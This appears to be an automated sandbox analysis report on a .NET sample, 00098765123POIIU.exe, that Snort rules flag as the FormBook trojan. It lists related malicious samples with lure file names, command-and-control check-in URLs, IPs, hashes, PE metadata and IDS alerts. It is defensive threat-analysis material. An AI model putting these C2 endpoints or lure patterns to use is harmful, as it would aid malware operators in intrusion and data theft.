                                                                            • Enable AMSI
                                                                            • Found application associated with file extension: .exe
                                                                            Warnings:
                                                                            Show All
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 104.43.193.48, 20.82.210.154, 104.43.139.144, 92.122.145.220, 104.42.151.234, 52.147.198.201, 20.82.209.183, 92.122.213.247, 92.122.213.194, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 23.218.208.56
                                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/411893/sample/00098765123POIIU.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            08:40:50API Interceptor1x Sleep call for process: 00098765123POIIU.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            198.54.117.217PO09641.exeGet hashmaliciousBrowse
                                                                            • www.three.guide/or4i/?r6t0=ISmcLWbttgzNl3S+HoD6Vc0lCJJNaAGVBan5Qv4VPPEWmW3IO7efGbhB2CSdwdPw0oihWd4h6A==&UL=ER-POL
                                                                            DHL Receipt_AWB811470484778.exeGet hashmaliciousBrowse
                                                                            • www.freedomseattle.net/a7dr/?vT=dnELQI/JNuXmZ37avi4LIab4hJbw2Vc5HVZeaTn3KkFU8mDNqnlGO0BU5Q7sK/G80hxT&S0Gl9T=RPHlpDKhNf_x
                                                                            NEW ORDER.exeGet hashmaliciousBrowse
                                                                            • www.beautiful.tours/u8nw/?tzr4=jlIXVLPHc&GVIp=MQ9/9ugzkHdx3WtCI0DhBFFcg9k9u8cd1L6Gj19/moDWYxZ8Cy1uW7tlf4zXGC0Em/rodg1Ltg==
                                                                            REVISED PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                            • www.beautiful.tours/u8nw/?sPxXAv=MQ9/9ugzkHdx3WtCI0DhBFFcg9k9u8cd1L6Gj19/moDWYxZ8Cy1uW7tlf7fUay48reW+&Lvdl=2d54
                                                                            qmhFLhRoEc.exeGet hashmaliciousBrowse
                                                                            • www.boogerstv.com/p2io/?EzuxZr=3fX4&YrCXdBfh=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxb9s6RBL4M
                                                                            PO#293701 pdf.exeGet hashmaliciousBrowse
                                                                            • www.namigweart.com/gnk/?yVMpQRoH=MNkYRHrFiJ3ZYZdJiDyfwxfSkWZoeKtU/DCGyAPFpsj9fIsyB3x/OR6dyoZchD+MHRUk&1bw=LhhxoDihs4blQf90
                                                                            scan copy 2402021.exeGet hashmaliciousBrowse
                                                                            • www.barebeautybrand.com/edbs/?pPX=Ekboab0eq8QaRRJsr09zs/Usmrg5EP+fQbkocCp54h0GPmynCi9xyIzJuf9mI75mNtoy&1bj=jlK0MdGxr
                                                                            winlog.exeGet hashmaliciousBrowse
                                                                            • www.switcheo.finance/uwec/?uzu8=3cOH6CffnF8zA2vO0DHvKlrvSwO+w2vUbH/s+qgAJjYXXQ/ohIL0shsdTQ1SGfHdXsYV&NjQhkT=8p44gXmp
                                                                            SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                                            • www.pedipawstorpu.club/qqeq/?UR-TRLn=sH0yzsD9GLffG7QHzFk+WPFlanh/Hl4cG4Mtr1NsrmWvZmIzl52FJiSECAKjDTLNRDZM&P6u=Hb9l0TTXQ4NLhX
                                                                            PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                            • www.barebeautybrand.com/edbs/?MnZ=GXLpz&LZ9p=Ekboab0eq8QaRRJsr09zs/Usmrg5EP+fQbkocCp54h0GPmynCi9xyIzJuf9mI75mNtoy
                                                                            RFQ00787676545654300RITEC.docGet hashmaliciousBrowse
                                                                            • www.thedropofadime.com/fdr/?tB=ML04NN5pqlvxO&ON=w+MOmg56lj3OTKb6Njao1KTxIyWrEBoWkIpOmUr6B+C461zFaJnxOWqDZLUBsXUm7C2IYQ==
                                                                            2021_03_16.exeGet hashmaliciousBrowse
                                                                            • www.billygoatoffroad.com/2bg/?lnud=VN1h6wF4Q5FdIJqGrBTb9BHw34iC7Ed/xTYRvOxB+Wx8IWI5BC8crz5jANyA/f3PzvgikX0fTA==&1bm=3fedQNQ0wlQl0H
                                                                            New order.exeGet hashmaliciousBrowse
                                                                            • www.billygoatoffroad.com/vsk9/?Txo=frrDEYAQcmIKKd+h99SuKftDKbrsW4sis1j6GPur8LXBsV7ytfxJ82cOL3edklbj6Y8d&v2=lhvx
                                                                            E4AaEjT91C.exeGet hashmaliciousBrowse
                                                                            • www.adigitaldemocracy.computer/smd0/?ytsDIrI=/m0nPq19FTGWl+pwdJdZDW8lKKfn+gzot6pyLcSqpbZZHmz6wG3t5wkoCXqRRpZdVpVA&JlD=-ZO830CpiTE0
                                                                            yCWzTRmMP4.exeGet hashmaliciousBrowse
                                                                            • www.ifdca.com/m0rc/?_8O8k0=lbR5C4q/Bs6c3SKeepmv0Da9hIgPOrZf3Ut381rRSdXn0224bmGUGa2i5otuNyD2uAEY&GV1D=5jRXbDA0P8Pt
                                                                            20210303948387477467,pdf.exeGet hashmaliciousBrowse
                                                                            • www.acrellp.xyz/gh6n/?QT=ejoPPzppZh&olrxUr=Jv1yZqqmx7iobqKz/k4h7qcezK7xZ7+1yQO2rW33jEVEYBhGCg+kp/27Js+JjVuvVX/lVPhUFg==
                                                                            dwg.exeGet hashmaliciousBrowse
                                                                            • www.peach-stage.finance/ripw/?YL0=dCjXoVRpr2af9QodMp9+mGuHLreZstKI/quBwl0OlmfQH1oJq3AfCIolXwTPm4j1DndJ&DhAH08=9rzdODV81V
                                                                            PO#3043.pdf.exeGet hashmaliciousBrowse
                                                                            • www.restoredscore.com/god/?MjdX=CXL40t&sPxXAvR=k9o7FTMHfg0GnRh/I3KZHYV4w+5DJYUrlrfZnUfQ2Cwkl4pfhmXZs0/uQw1z5wJZm/w7
                                                                            quotations pdf.exeGet hashmaliciousBrowse
                                                                            • www.doorman.pro/bft/?XbcxulJp=cPB7zr1p3SmwgzYXiBUkF9mwqufO0UDDdPUnBBhQn+hhkWASV2AK1gVN757Bb1qin2Mh&Txo8_2=Ezut_DzP
                                                                            AANK5mcsUZ.exeGet hashmaliciousBrowse
                                                                            • www.pendekar-qq.xyz/da0a/?EjY=dhrdFxjxtJ0&1bz=3idupu15OOeW9zfMjMdgut9mS0cjf15hkTqMaFLLCpXgHo77noPJVLOm8Xjndd1KbXgo
                                                                            199.192.23.253doc_391200004532000450.exeGet hashmaliciousBrowse
                                                                            • www.contorig2.com/ipio/?i4=liZnghEvEkzeEX2jVRJsXsZAGqVWb5PU4n5DaQMRTDWQd5q6Cg/gdRecp1UZhog3rBVx&erOx=uDHxU

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            www.hysjs168.com0987654332.exeGet hashmaliciousBrowse
                                                                            • 182.61.46.180
                                                                            POI09876OIUY.exeGet hashmaliciousBrowse
                                                                            • 182.61.46.180
                                                                            987654OIUYFG.exeGet hashmaliciousBrowse
                                                                            • 182.61.46.180
                                                                            0876543123.exeGet hashmaliciousBrowse
                                                                            • 182.61.46.180
                                                                            PO#10244.exeGet hashmaliciousBrowse
                                                                            • 182.61.46.180
                                                                            aoKzFd4OTYlYvzi.exeGet hashmaliciousBrowse
                                                                            • 182.61.46.180
                                                                            M23ErBe32Z0IeOO.exeGet hashmaliciousBrowse
                                                                            • 182.61.46.180
                                                                            70pGP1JaCf6M0kf.exeGet hashmaliciousBrowse
                                                                            • 182.61.46.180
                                                                            AL-IEDAHINV.No09876543.exeGet hashmaliciousBrowse
                                                                            • 182.61.46.180
                                                                            PI34567890987.exeGet hashmaliciousBrowse
                                                                            • 182.61.46.180
                                                                            www.buraktradingltd.com70pGP1JaCf6M0kf.exeGet hashmaliciousBrowse
                                                                            • 173.236.152.151
                                                                            www.ytksw.comPOI09876OIUY.exeGet hashmaliciousBrowse
                                                                            • 45.39.20.158
                                                                            987654OIUYFG.exeGet hashmaliciousBrowse
                                                                            • 45.39.20.158
                                                                            PO#10244.exeGet hashmaliciousBrowse
                                                                            • 45.39.20.158
                                                                            parkingpage.namecheap.comInquiry_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.215
                                                                            Citvonvhciktufwvyzyhistnewdjgsoqdr.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.212
                                                                            NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.212
                                                                            POI09876OIUY.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.210
                                                                            EDS03932,pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.216
                                                                            Purchase Order.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.216
                                                                            slot Charges.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.216
                                                                            PO09641.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.215
                                                                            BORMAR SA_Cotizaci#U00f3n de producto doc.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.211
                                                                            Purchase Order-10764.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.212
                                                                            4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.218
                                                                            2B0CsHzr8o.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.216
                                                                            60b88477_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.215
                                                                            DHL Receipt_AWB811470484778.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.217
                                                                            NEW ORDER.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.217
                                                                            0876543123.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.210
                                                                            g1EhgmCqCD.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.216
                                                                            Payment.xlsxGet hashmaliciousBrowse
                                                                            • 198.54.117.210
                                                                            w73FtMA4ZTl9NFm.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.212
                                                                            Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.212

                                                                            ASN

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            NAMECHEAP-NETUSe8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                            • 185.61.154.27
                                                                            2021_May_Quotation_pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.115.133
                                                                            337840b9_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            Citvonvhciktufwvyzyhistnewdjgsoqdr.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.212
                                                                            Updated Order list -804333.exeGet hashmaliciousBrowse
                                                                            • 198.54.115.56
                                                                            NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.212
                                                                            BELLOW FABRICATION Dwg.exeGet hashmaliciousBrowse
                                                                            • 199.188.200.15
                                                                            file.exeGet hashmaliciousBrowse
                                                                            • 198.54.115.133
                                                                            scan of document 5336227.xlsmGet hashmaliciousBrowse
                                                                            • 162.0.233.152
                                                                            vy38Kw9qRh.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            copy of order 9119.xlsmGet hashmaliciousBrowse
                                                                            • 162.0.233.152
                                                                            generated payment 330070.xlsmGet hashmaliciousBrowse
                                                                            • 162.0.233.152
                                                                            scan of bill 0905.xlsmGet hashmaliciousBrowse
                                                                            • 162.0.233.152
                                                                            ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                                                            • 162.0.229.247
                                                                            ePj6KfzLBxh4vbe.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            zkXpISzeo3.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            PI-ARKEMIX HMX20210511_pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.115.133
                                                                            specifications.exeGet hashmaliciousBrowse
                                                                            • 198.54.126.165
                                                                            yl9KgwwOXDZoGMw.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            cargo details.exeGet hashmaliciousBrowse
                                                                            • 198.54.126.165
                                                                            NAMECHEAP-NETUSe8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                            • 185.61.154.27
                                                                            2021_May_Quotation_pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.115.133
                                                                            337840b9_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            Citvonvhciktufwvyzyhistnewdjgsoqdr.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.212
                                                                            Updated Order list -804333.exeGet hashmaliciousBrowse
                                                                            • 198.54.115.56
                                                                            NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.212
                                                                            BELLOW FABRICATION Dwg.exeGet hashmaliciousBrowse
                                                                            • 199.188.200.15
                                                                            file.exeGet hashmaliciousBrowse
                                                                            • 198.54.115.133
                                                                            scan of document 5336227.xlsmGet hashmaliciousBrowse
                                                                            • 162.0.233.152
                                                                            vy38Kw9qRh.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            copy of order 9119.xlsmGet hashmaliciousBrowse
                                                                            • 162.0.233.152
                                                                            generated payment 330070.xlsmGet hashmaliciousBrowse
                                                                            • 162.0.233.152
                                                                            scan of bill 0905.xlsmGet hashmaliciousBrowse
                                                                            • 162.0.233.152
                                                                            ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                                                            • 162.0.229.247
                                                                            ePj6KfzLBxh4vbe.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            zkXpISzeo3.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            PI-ARKEMIX HMX20210511_pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.115.133
                                                                            specifications.exeGet hashmaliciousBrowse
                                                                            • 198.54.126.165
                                                                            yl9KgwwOXDZoGMw.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            cargo details.exeGet hashmaliciousBrowse
                                                                            • 198.54.126.165
                                                                            GODADDY-AMSDEcorrect invoice.exeGet hashmaliciousBrowse
                                                                            • 160.153.136.3
                                                                            export of document 555091.xlsmGet hashmaliciousBrowse
                                                                            • 160.153.133.217
                                                                            copy of invoice 4347.xlsmGet hashmaliciousBrowse
                                                                            • 160.153.133.217
                                                                            SWIFT001411983HNK.exeGet hashmaliciousBrowse
                                                                            • 160.153.136.3
                                                                            da.exeGet hashmaliciousBrowse
                                                                            • 160.153.136.3
                                                                            New Order.exeGet hashmaliciousBrowse
                                                                            • 160.153.136.3
                                                                            scan of document 8030.xlsmGet hashmaliciousBrowse
                                                                            • 160.153.133.217
                                                                            scan of check 0561.xlsmGet hashmaliciousBrowse
                                                                            • 160.153.133.217
                                                                            Q5280RLP20V.docGet hashmaliciousBrowse
                                                                            • 160.153.255.20
                                                                            08201450PKT.docGet hashmaliciousBrowse
                                                                            • 160.153.255.20
                                                                            Shipping Document.exeGet hashmaliciousBrowse
                                                                            • 160.153.136.3
                                                                            winlog.exeGet hashmaliciousBrowse
                                                                            • 160.153.136.3
                                                                            generated order 677120.xlsmGet hashmaliciousBrowse
                                                                            • 160.153.133.77
                                                                            scan of order 1231.xlsmGet hashmaliciousBrowse
                                                                            • 160.153.133.77
                                                                            copy of check 542554.xlsmGet hashmaliciousBrowse
                                                                            • 160.153.133.77
                                                                            scan of order 2570.xlsmGet hashmaliciousBrowse
                                                                            • 160.153.133.77
                                                                            document 23513.xlsmGet hashmaliciousBrowse
                                                                            • 160.153.133.77
                                                                            export of payment 2993132.xlsmGet hashmaliciousBrowse
                                                                            • 160.153.133.77
                                                                            products order pdf .exeGet hashmaliciousBrowse
                                                                            • 160.153.128.3
                                                                            60b88477_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                            • 160.153.137.210

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\00098765123POIIU.exe.log
                                                                            Process:C:\Users\user\Desktop\00098765123POIIU.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1314
                                                                            Entropy (8bit):5.350128552078965
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                            MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                            SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                            SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                            SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                            Malicious:true
                                                                            Reputation:high, very likely benign file
                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.883159451685763
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            File name:00098765123POIIU.exe
                                                                            File size:968192
                                                                            MD5:4e2d6ab0c9a56aee76ba33bd26dce9b1
                                                                            SHA1:52950b4637fc55518efc063ced7bec0867f9051e
                                                                            SHA256:5e2255d59560c85c4a6c30ffa54e00b2805b584292de464befaf01a614539229
                                                                            SHA512:f9880e28f784bbee81cecfcd4a4ad7cb61cd5b37f8ea18340d894e0825b83e40ec34cd318c6cec273f5b21e8013a1212878d9db5465a16b7517d5d649d17bca1
                                                                            SSDEEP:12288:H0g5qL6Evo89Ak5qLLmWr56mlfNJ/P9KLPsU37zASu4Gqi7OToe3XHiQgVw5qLcc:HxI6jwdILm3mlfNJ/P9Krzrnue5OOIRx
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X-.`.....................0........... ........@.. ....................... ............@................................

                                                                            File Icon

                                                                            Icon Hash:f2d2e9fcc4ead362

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4eb3ae
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x609B2D58 [Wed May 12 01:20:24 2021 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xeb3540x57.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xee0000x2d24.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xec0000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000xe93b40xe9400False0.914642366693data7.9019999335IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .reloc0xec0000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0xee0000x2d240x2e00False0.364639945652data5.10988831847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_ICON0xee1300x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                            RT_GROUP_ICON0xf06d80x14data
                                                                            RT_VERSION0xf06ec0x38cPGP symmetric key encrypted data - Plaintext or unencrypted data
                                                                            RT_MANIFEST0xf0a780x2aaXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Version Infos

                                                                            DescriptionData
                                                                            Translation0x0000 0x04b0
                                                                            LegalCopyrightCopyright 2013
                                                                            Assembly Version3.0.0.0
                                                                            InternalNameApplicationStateDisposition.exe
                                                                            FileVersion3.0.0.0
                                                                            CompanyName
                                                                            LegalTrademarks
                                                                            Comments
                                                                            ProductNameServerManager_Core
                                                                            ProductVersion3.0.0.0
                                                                            FileDescriptionServerManager_Core
                                                                            OriginalFilenameApplicationStateDisposition.exe

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            05/12/21-08:41:58.906670TCP1201ATTACK-RESPONSES 403 Forbidden804973734.102.136.180192.168.2.6
                                                                            05/12/21-08:42:09.429548TCP1201ATTACK-RESPONSES 403 Forbidden804973934.102.136.180192.168.2.6
                                                                            05/12/21-08:42:20.500357TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.6173.236.152.151
                                                                            05/12/21-08:42:20.500357TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.6173.236.152.151
                                                                            05/12/21-08:42:20.500357TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.6173.236.152.151
                                                                            05/12/21-08:42:41.336273TCP1201ATTACK-RESPONSES 403 Forbidden804974834.102.136.180192.168.2.6

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            May 12, 2021 08:41:47.990514040 CEST4973180192.168.2.6199.192.23.253
